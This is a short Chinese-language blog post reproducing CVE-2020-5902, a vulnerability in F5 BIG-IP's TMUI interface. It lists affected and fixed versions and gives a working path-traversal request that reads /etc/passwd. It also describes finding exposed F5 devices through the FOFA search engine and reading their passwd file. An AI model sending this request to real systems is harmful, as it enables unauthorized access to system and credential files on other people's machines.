F5 最新漏洞-CVE-2020-5902 BIG-IP RCE复现

认识F5

F5是一家国外安全厂商，国内比较有名的产品是负载均衡,产品名字也叫F5，各大银行及互联网金融行业可能用到了该厂商这款产品；产品主要是用来做链路负责和应用负载；相比国内的启明、绿盟的负载设备，F5负载设备个人认为是比较好用的，当然价格也不便宜，先来看一下设备登录页，至于里面的功能这里不做介绍。

了解完F5产品左右，我们来关注最新爆出来的安全漏洞

近期爆RCE漏洞是什么

------cve-2020-5902 BIG-IP RCE漏洞

简介

BIG-IP的TMUI存在RCE漏洞

影响范围

版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

修复方法

升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

文件读取

https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

利用fofa搜索F5指纹信息，以搜出来IP:8443为列，读取系统passwd文件如下

 

参考链接：

https://www.cnblogs.com/potatsoSec/p/13253288.html